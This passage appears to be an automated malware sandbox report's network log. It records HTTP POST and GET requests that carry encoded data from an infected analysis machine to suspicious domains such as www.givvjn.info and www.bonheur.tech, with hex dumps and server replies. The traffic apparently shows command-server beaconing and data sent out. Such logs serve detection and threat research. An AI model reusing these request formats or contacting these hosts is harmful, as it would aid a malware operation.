                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 6c 63 58 74 63 50 4e 2b 46 4a 48 4a 35 4e 58 77 38 35 42 54 75 2f 6a 55 38 36 76 32 62 65 4e 59 59 49 59 59 64 44 79 79 62 53 6a 74 71 31 6d 39 6a 77 6b 5a 32 6d 68 73 57 38 32 41 69 45 67 76 79 4d 38 4f 53 6f 67 42 4f 7a 67 61 6a 6f 74 63 77 5a 31 2b 53 48 5a 50 73 46 4e 57 4a 5a 30 37 4c 6c 7a 69 34 42 61 32 5a 4d 66 6b 37 55 58 33 4a 65 6b 62 30 72 4f 6b 49 65 56 6f 59 31 32 35 6a 6e 49 34 55 38 2f 61 2b 57 62 56 64 70 65 44 48 72 37 31 67 6e 72 47 6e 71 75 4c 34 41 33 5a 31 6e 74 59 62 76 4f 56 32 2b 56 74 66 33 38 38 57 2f 67 5a 64 2f 44 63 32 6f 47 35 66 4c 70 77 7a 32 59 62 62 77 67 37 39 44 2f 4f 44 2f 73 49 37 37 5a 37 55 32 42 4f 37 54 34 48 5a 74 41 75 43 38 61 74 54 50 68 6a 38 4b 38 47 56 4d 6d 55 74 72 42 44 7a 36 78 43 4f 52 4e 79 59 78 42 51 48 62 6f 47 69 79 2b 33 62 4a 48 79 50 45 55 50 45 72 4e 4a 57 46 59 35 33 5a 6f 51 4d 68 4d 63 54 77 6f 59 68 6f 76 69 54 49 35 38 32 61 55 34 43 51 36 37 53 53 31 76 64 73 58 53 74 52 76 2b 76 68 38 55 62 6c 71 6e 6f 76 32 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=lcXtcPN+FJHJ5NXw85BTu/jU86v2beNYYIYYdDyybSjtq1m9jwkZ2mhsW82AiEgvyM8OSogBOzgajotcwZ1+SHZPsFNWJZ07Llzi4Ba2ZMfk7UX3Jekb0rOkIeVoY125jnI4U8/a+WbVdpeDHr71gnrGnquL4A3Z1ntYbvOV2+Vtf388W/gZd/Dc2oG5fLpwz2Ybbwg79D/OD/sI77Z7U2BO7T4HZtAuC8atTPhj8K8GVMmUtrBDz6xCORNyYxBQHboGiy+3bJHyPEUPErNJWFY53ZoQMhMcTwoYhoviTI582aU4CQ67SS1vdsXStRv+vh8Ublqnov25i2a05JwCCuayX5Tiv3Q9r0l2Fk9jAwMH1wZw7MU2xc22Q9Xoy62a9L7gbvjufuA9onDxUPyGflXzVBnC+4/TasnwSZGBNGoCy37jJpOZkCIQuGZCMDoKecPAkvMmOZj7oEIfj+U3iIJAITGmTg3kriOwwkDRkuKDeUzyxDHv6u5TkqIQkWiPtqB8GtCaX8ayvIk2j2WjKdpy+U+X3hfV4K3LZblCI2wnCdc24Y07fRW3+xG2g6IRWSCf+N0ifbV4QjMETcMjNAtEnGxuxZ/couwq84+S08yllM2dxP5zJEhXSJ6nKM3bqgFzB9yKX5Wp7L6u+vEl7lZprIcYbY+HuE8GqEwAiy40/X+djjFtvLcJcfKpcuixYlHFPwn8G2Gh7eYBkSPwrsRW5n7fEvq8akP2xwma/LBhahgevVwbCp/1IWFoBtTD2y630B2+0fpRwZB2ZHwjruH9Kc6+bqQnqqW9i0CFFbV5GIgY6VF186XPC/VviO4JPKeLtAakEyKtFyNlSfdorXtJC7tIGguxzTHXVXta0oYY54uIuzAaYa2axOJlmDLXOupbXS+8KM+jblMR6xqA+1leyw+Lhp3ZNn+cFFnkpisDYQyYm6yp/ZolbX31B/sRwEHD9FxPCxJGulJuq4hEcFVhEda0jAk7pqWJo7eXrhMWK [TRUNCATED]
                                                                                    Jan 9, 2025 16:58:11.627146959 CET1352OUTData Raw: 47 53 65 75 37 63 75 42 76 70 74 36 59 33 30 47 62 42 57 44 35 65 70 7a 63 4a 61 4f 53 71 78 35 62 71 71 46 6a 4a 4f 31 52 5a 33 61 2f 4a 2f 2f 78 68 78 39 41 58 6f 68 41 50 73 42 2f 6e 68 37 6c 51 6b 76 6e 55 72 43 30 59 6a 44 38 74 35 75 76 4a
                                                                                    Data Ascii: GSeu7cuBvpt6Y30GbBWD5epzcJaOSqx5bqqFjJO1RZ3a/J//xhx9AXohAPsB/nh7lQkvnUrC0YjD8t5uvJH+btWLlkM5T++pBUQ57tsNVA25ZzYgNS9RHwBLeXsMQCl1VLVt7rV7Ule2JzZukKpuKoTaiQijN4V6v5WrCsKUfUXnwhlGUX+vMWIlAoMw/PWjcHnvseFjA8OX1jj+yoW515+tok/RZwFLSS3I98ReNPwgY/iFRDm
                                                                                    Jan 9, 2025 16:58:11.813493967 CET918INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:11 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    65192.168.11.3049890199.192.21.16980
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:14.340969086 CET533OUTGET /qps0/?6B-l7F=oe/Nf5ZxPavzyNCN5fJJ2OrxgayHc7sFQb4gcz6uUjnOuiLJkTwk1EFGD/G87FIa6dxrZOgAQGccmvtK4ohyPgEShywSULdIISv/2iuVOPOn5EuQA8dSwoA=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.bokus.site
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:58:14.524734020 CET933INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:58:14 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    66192.168.11.304989147.83.1.9080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:28.098572969 CET796OUTPOST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 37 4e 45 4b 71 36 34 51 64 75 31 2b 36 56 72 6e 63 57 42 4e 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ7NEKq64Qdu1+6VrncWBNA==
                                                                                    Jan 9, 2025 16:58:29.108926058 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:58:28 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    67192.168.11.304989247.83.1.9080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:30.949297905 CET816OUTPOST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 46 46 41 4c 71 46 34 76 45 6d 7a 64 31 4c 4c 46 4e 32 68 55 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYFFALqF4vEmzd1LLFN2hU=
                                                                                    Jan 9, 2025 16:58:31.945035934 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:58:31 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    68192.168.11.304989347.83.1.9080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:33.787697077 CET1289OUTPOST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 78 2b 4d 70 6b 4f 42 78 72 78 49 4f 72 42 4b 4c 49 66 77 6b 34 33 6f 62 4e 70 35 71 76 6a 76 6f 63 73 49 66 34 35 71 54 59 54 74 61 75 36 61 6d 49 73 35 7a 74 33 30 4e 47 68 6e 55 53 57 61 54 34 44 4c 75 44 4a 33 61 65 70 61 74 68 30 68 61 30 63 73 51 39 63 4e 42 62 35 74 4b 4f 69 5a 64 46 61 48 76 74 4a 78 67 42 48 4e 62 75 4e 64 65 6e 4e 47 47 4d 70 51 49 61 39 6a 4f 74 33 73 73 75 78 49 5a 63 38 51 67 62 68 53 63 31 66 72 31 56 53 63 45 59 74 56 47 74 46 59 34 42 45 76 4a 75 52 37 6c 33 44 74 4e 6a 48 37 72 63 2f 58 4e 7a 50 72 72 30 71 34 52 43 4a 42 48 68 42 66 64 34 79 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1x+MpkOBxrxIOrBKLIfwk43obNp5qvjvocsIf45qTYTtau6amIs5zt30NGhnUSWaT4DLuDJ3aepath0ha0csQ9cNBb5tKOiZdFaHvtJxgBHNbuNdenNGGMpQIa9jOt3ssuxIZc8QgbhSc1fr1VScEYtVGtFY4BEvJuR7l3DtNjH7rc/XNzPrr0q4RCJBHhBfd4yYvNOtjBTBdGsQtdgnMEL78hGmO563XCDuoJPI1ZWZHFZ3X+w2mGC2kbQsRPXaK7nA/z+QrK6gpC8u6PWPiaGfZj6PjNBWRV9J/N9uljrKOkpC/E1/2wNDCIbR9eBBvmQT2RpmyhZiHUeYs254QkMSMWQLO1NkXlOGTvFo2Wfn1KhXbnFJLGimT6MxlzdwwpcKKAJzZKZm0nrVkzz/C533VZQcL2uNUgwgHDOQqkWYjH0aZ0xljVTBrUwDCkimuuZhkgeVtPT007y//uzLpN2WZsP9bTBDN6ZQswmegC9iq/qqKpUFE4g8w5HGw3Rr/v/tYWf7yep2k9Sj4IDP4bRbDqwwBzDMGkOQYrLd
                                                                                    Jan 9, 2025 16:58:33.787744999 CET2578OUTData Raw: 6c 62 65 6d 2b 34 46 75 6d 4d 54 42 43 4d 37 51 44 52 63 45 74 55 63 44 53 6d 44 6d 76 31 75 43 73 30 47 34 37 37 54 6b 78 68 4d 4c 6b 64 6f 61 36 4a 42 37 32 4f 30 56 48 56 64 71 35 36 45 48 57 34 59 4a 5a 46 70 31 65 63 51 59 75 31 78 72 6d 65
                                                                                    Data Ascii: lbem+4FumMTBCM7QDRcEtUcDSmDmv1uCs0G477TkxhMLkdoa6JB72O0VHVdq56EHW4YJZFp1ecQYu1xrmeGNdI3VExexlLQBoX51Ui+gEdaqY3qPSurIEP8VE64VbvFoP2oAPgiZag2seiilWmTORTLbWYZsiDrLSGrlInU1aSmf4SIPu82+Va05mstIVATDVl2jBLJUT10qP8dU1br4Nm/GdJtI4i6+X0sNdCz17dRMDT5yOrX
                                                                                    Jan 9, 2025 16:58:33.787792921 CET66OUTData Raw: 58 61 2f 45 75 78 64 31 4a 6b 74 77 71 54 6d 74 56 34 74 53 73 45 6b 78 34 78 37 37 76 64 2b 56 4c 4e 65 6d 35 42 59 6d 66 54 46 59 33 6c 39 4a 49 61 79 42 6e 33 64 6e 6a 52 65 2b 53 45 43 67 3d 3d
                                                                                    Data Ascii: Xa/Euxd1JktwqTmtV4tSsEkx4x77vd+VLNem5BYmfTFY3l9JIayBn3dnjRe+SECg==
                                                                                    Jan 9, 2025 16:58:34.814905882 CET137INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:58:34 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    69192.168.11.304989447.83.1.9080
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:36.623559952 CET534OUTGET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:58:37.649324894 CET139INHTTP/1.1 567 unknown
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:58:37 GMT
                                                                                    Content-Length: 17
                                                                                    Connection: close
                                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                    Data Ascii: Request too large


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    70192.168.11.304989513.248.169.4880
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:42.821834087 CET799OUTPOST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 34 32 2b 6b 6c 78 77 74 78 73 71 57 30 44 67 30 4e 2b 33 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys42+klxwtxsqW0Dg0N+3Hw==
                                                                                    Jan 9, 2025 16:58:42.958482027 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    71192.168.11.304989613.248.169.4880
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:45.491806984 CET819OUTPOST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 48 45 46 46 36 4d 46 59 6a 58 53 62 6b 4f 76 37 61 38 64 45 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RHEFF6MFYjXSbkOv7a8dE=
                                                                                    Jan 9, 2025 16:58:45.627908945 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    72192.168.11.304989713.248.169.4880
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:58:48.166132927 CET3936OUTPOST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
